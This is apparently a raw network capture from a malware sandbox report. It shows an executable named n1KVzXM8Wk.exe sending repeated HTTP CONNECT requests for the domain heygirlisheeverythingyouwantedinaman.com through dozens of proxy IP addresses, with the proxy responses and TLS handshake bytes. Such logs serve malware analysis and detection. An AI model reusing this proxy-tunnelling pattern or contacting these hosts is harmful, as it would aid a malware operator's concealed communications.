                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.475126982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.865896940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.063255072 CET60INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Apache


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      414192.168.2.451329104.18.103.125806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.432049990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.532018900 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      415192.168.2.451199113.30.149.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.433240891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      416192.168.2.451324154.12.253.232179706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.435750961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.902721882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.334712982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.098835945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.537626028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.903760910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.271034002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.944230080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.334717989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      417192.168.2.45117494.45.74.6080806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.435897112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.037456036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      418192.168.2.451387202.159.107.174436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.437242031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      419192.168.2.451389202.159.107.174436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.439487934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      420192.168.2.451281104.17.166.210806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.448447943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.535969973 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      421192.168.2.4512125.9.98.14231296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.451325893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      422192.168.2.45123198.170.57.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.451353073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      423192.168.2.45118495.67.79.25480806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.451816082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      424192.168.2.45125072.195.34.4141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.452138901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      425192.168.2.4510304.144.136.15806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.460705996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.607911110 CET59INHTTP/1.1 200 Connection Established
                                                                                                      Proxy-agent: nginx
                                                                                                      Feb 23, 2024 09:45:21.611229897 CET394OUTData Raw: 16 03 03 01 85 01 00 01 81 03 03 65 d8 5b 21 b8 8e bd 38 41 9c 6e 1a fc 0c e8 82 0d a5 4a ce 69 98 46 06 60 c3 97 47 46 c2 4e 6a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[!8AnJiF`GFNj*,+0/$#('=<5/.-+(heygirlisheeverythingyouwantedinaman.com#C_r}zH&5{_G>atr
                                                                                                      Feb 23, 2024 09:45:21.946983099 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 21 1e cd e4 bd 35 2b b8 00 fd 61 8a 9c 90 fb fd ad e0 2f 83 d9 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[!5+a/DOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:21.947000980 CET1286INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't;H%['rBu*q,/aeYXhV
                                                                                                      Feb 23, 2024 09:45:21.947036028 CET1286INData Raw: 59 02 10 51 5c e3 c0 2b fd b7 06 48 51 7e 09 5e 3f 0f dc a7 fe 97 e7 79 c5 0e 44 89 78 c5 69 59 29 a0 9a 3a 48 36 29 a6 94 93 55 2d b8 47 b5 e9 96 b5 9f 07 cd a6 ab 3e 32 8a c0 86 83 c5 c1 41 c8 9f 2f 35 8e 0d c0 07 7a e1 ac c9 65 b5 cb 8a a7 dd
                                                                                                      Data Ascii: YQ\+HQ~^?yDxiY):H6)U-G>2A/5zeqae92>z6VWAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\
                                                                                                      Feb 23, 2024 09:45:21.947050095 CET372INData Raw: 06 03 55 1d 23 04 18 30 16 80 14 60 7b 66 1a 45 0d 97 ca 89 50 2f 7d 04 cd 34 a8 ff fc fd 4b 30 60 06 08 2b 06 01 05 05 07 01 01 04 54 30 52 30 25 06 08 2b 06 01 05 05 07 30 01 86 19 68 74 74 70 3a 2f 2f 6f 63 73 70 2e 70 6b 69 2e 67 6f 6f 67 2f
                                                                                                      Data Ascii: U#0`{fEP/}4K0`+T0R0%+0http://ocsp.pki.goog/gsr10)+0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0
                                                                                                      Feb 23, 2024 09:45:21.947063923 CET460INData Raw: 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7 d3 26 bf 70 e3 3d f4 67 6d 3d 7c e5 34 88 e3 32 fa a7 6e 06 6a 6f bd 8b 91 ee 16 4b e8 3b a9 b3 37 e7 c3 44 a4 7e
                                                                                                      Data Ascii: o*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( $:c>BtM8oHSx3b!pY`/h8`rj2IC\4G.
                                                                                                      Feb 23, 2024 09:45:21.981333017 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 71 fd ad 46 cc 97 47 65 e3 a2 85 e2 b6 af 0c 5d 41 f2 2f 71 ee bc c4 5a 36 b5 33 d4 83 ac bd 25 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 0d 75 8f e9 ac d4 4b 8a 41 4a 32 e2 53 b6 74 0e 0e 52 b5 b4 39
                                                                                                      Data Ascii: %! qFGe]A/qZ63%(uKAJ2StR9X(`!M,/1
                                                                                                      Feb 23, 2024 09:45:22.317893982 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 3b ec ea 22 b9 7a a8 ed aa b5 49 1a 40 dd fc 8d 0e 3c b2 c6 51 74 58 ca f1 ae 98 66 da da e8 09 3d e0 e6 df 90 ac 9e 1e 8b 8d d6 18 a7 62 28 80 90 7b 56 13 9b 9b 87 e8 23 84 e5 bb 0f 70 d1 8c 22 37 d3
                                                                                                      Data Ascii: ;"zI@<QtXf=b({V#p"7c|Ac}>3~fUy'IC**#.Nhb]K1"B/lP&2d]^UpAYT#%p;QW,4o}'~(:/ -(
                                                                                                      Feb 23, 2024 09:45:22.326905012 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 a6 8e 0f f3 a3 d6 de 76 87 b5 6f 0e dd a8 1c ec 75 10 c9 3d 48 36 a0 92 a6 3d 72 21 1e 26 a2 10 32 80 88 33 ae c6 c1 bb 9d 2c 2d c3 ca ae 23 30 aa 50 84 65 f5 c9 b4 6b c6 8b 0d c5 67 a9 0d ed e6 f6 23 b9 bd
                                                                                                      Data Ascii: vou=H6=r!&23,-#0Pekg#WR:SJh(x9]T>=?)Ge3XD(n
                                                                                                      Feb 23, 2024 09:45:23.071216106 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 9d cb d9 4b a6 b9 62 da c3 c6 56 a0 8d f9 05 86 4f 4e ef 4e 77 b3 03 6a 9e 65 b9 ae 0e c8 1a 3b 79 f0 4f 55 f2 13 af 9d 87 a8 58 60 0d 7b b0 46 54 ab 91 a9 0b 51 9b bf ab 33 0c 55 9a 47 40 b8 08 13 e8 98 47
                                                                                                      Data Ascii: qKbVONNwje;yOUX`{FTQ3UG@G&Ob=cyWt\^3t3NT0%#?OG@jD}Ztg6UJB6wI1/2.1nB3mLDz2g6/*5]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      426192.168.2.451253141.94.174.617726812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.463237047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      427192.168.2.45099461.133.66.6990026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.465658903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.827826977 CET311INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 166
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      428192.168.2.45133434.23.45.223806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.474322081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      429192.168.2.451266141.94.174.6355576812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.481400967 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      430192.168.2.45121645.239.175.1980806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.481775999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      431192.168.2.45063327.75.152.19110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.485733986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      432192.168.2.4510988.213.137.15580376812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.489928961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      433192.168.2.451321188.166.17.1888816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.490622997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.658667088 CET310INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                      Content-Length: 150
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      434192.168.2.451031203.95.198.14180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.491559982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      435192.168.2.451314198.57.195.42382426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.493078947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.974960089 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.680928946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.865859985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.975162029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.178388119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.365923882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.475399971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:41.681381941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      436192.168.2.451156103.146.137.910816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.499123096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:21.146842957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      437192.168.2.45127420.206.106.192806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.513540030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.735124111 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:20 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      438192.168.2.4513335.9.98.14223356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.517904997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      439192.168.2.451071182.72.203.243806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:20.533368111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.891199112 CET531INHTTP/1.1 405 Method Not Allowed
